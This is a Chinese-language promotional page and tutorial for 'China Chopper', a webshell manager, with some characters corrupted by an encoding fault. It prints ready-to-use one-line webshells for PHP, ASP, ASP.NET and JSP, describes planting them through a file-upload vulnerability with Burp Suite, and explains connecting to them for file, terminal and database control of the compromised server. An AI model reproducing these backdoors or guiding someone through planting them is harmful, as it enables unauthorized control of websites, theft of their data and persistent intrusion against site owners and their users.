中國(guó)菜刀(附詳細(xì)使用教程)

中國(guó)菜刀，不是原來(lái)切菜做飯的道具，而是一款專(zhuān)業(yè)的webshell管理工具，用途廣泛，使用方便，小巧實(shí)用。只要支持動(dòng)態(tài)腳本的網(wǎng)站，都可以用中國(guó)菜刀來(lái)進(jìn)行管理！程序大�。�214K，在非簡(jiǎn)體中文環(huán)境下使用時(shí)，自動(dòng)切換到英文界面。

webshell管理工具好用嗎

中國(guó)菜刀功能特色

在主視圖中右鍵/添加，在彈出的對(duì)話框中輸入服務(wù)端地址，連接的密碼(請(qǐng)注意上例中的pass字串)，選擇正確的腳本類(lèi)型和語(yǔ)言編碼，

保存后即可使用文件管理，虛擬終端，數(shù)據(jù)庫(kù)管理，自寫(xiě)腳本幾大塊功能。

1.文件管理：緩存下載目錄，并支持離線查看緩存目錄，上傳下載修改文件，比f(wàn)tp要好吧！

2.虛擬終端：人性化的設(shè)計(jì)，操作方便;(輸入HELP查看更多用法)

3.數(shù)據(jù)庫(kù)管理：圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式連接的數(shù)據(jù)庫(kù)。

4.網(wǎng)站蜘蛛功能：織出一張網(wǎng)站的目錄結(jié)構(gòu)。下載的列表文件存在桌面，右鍵菜單/載入U(xiǎn)RL列表即可以根據(jù)地址得到目錄結(jié)構(gòu)。

5.定時(shí)提醒：當(dāng)鬧鐘來(lái)使吧, 周期：每月/每周/每日/只一次。

6.快速啟動(dòng)：一些常用的快捷方式放在這里，可以指定用戶(hù)身份運(yùn)行程序。這部分?jǐn)?shù)據(jù)是以加密存儲(chǔ)的。

7.瀏覽器：地址欄輸入HELP

8.自定義服務(wù)端代碼：通過(guò)簡(jiǎn)單編碼后提交用戶(hù)自己的腳本到服務(wù)端執(zhí)行，實(shí)現(xiàn)豐富的功能，也可選擇發(fā)送到瀏覽器執(zhí)行。 如果要寫(xiě)自己的CCC腳本，可以參考一下CCC目錄下的示例代碼, 相信你也可以寫(xiě)出功能豐富的腳本可以在官網(wǎng)下載別人的CCC腳本，或分享你的得意之作。‍‍

注意：由于服務(wù)器的安全設(shè)置，某些功能可能不能正常使用。

webshell管理工具怎么用

中國(guó)菜刀詳細(xì)使用教程

1、打開(kāi)中國(guó)菜刀客戶(hù)端

2、在服務(wù)端運(yùn)行的代碼如下：

PHP:    <?php @eval($_POST['pass']);?>

ASP:    <%eval request(“pass”)%>

ASP.NET:    <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>

JSP：<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>

(注意: ASP.NET要單獨(dú)一個(gè)文件或此文件也是Jscript語(yǔ)言)

叉叉之前在上傳漏洞演示，利用burpsuite抓包改包上傳最后講到用菜刀連接，看看是怎么實(shí)現(xiàn)的：

在主視圖中右鍵/添加，在彈出的對(duì)話框中輸入服務(wù)端地址，連接的密碼(這個(gè)必須要)，選擇正確的腳本類(lèi)型和語(yǔ)言編碼，保存后即可使用文件管理，虛擬終端，數(shù)據(jù)庫(kù)管理三大塊功能。要是其它都沒(méi)錯(cuò)誤，那么可能就是你把語(yǔ)言編碼選錯(cuò)了.

3、點(diǎn)擊“添加”按鈕，成功后就會(huì)產(chǎn)生一條新的記錄，鼠標(biāo)右鍵點(diǎn)擊就可以進(jìn)行操作了，如下圖，可以進(jìn)行文件管理，數(shù)據(jù)庫(kù)管理，虛擬終端。哈哈...大功告成！

操作效果截圖：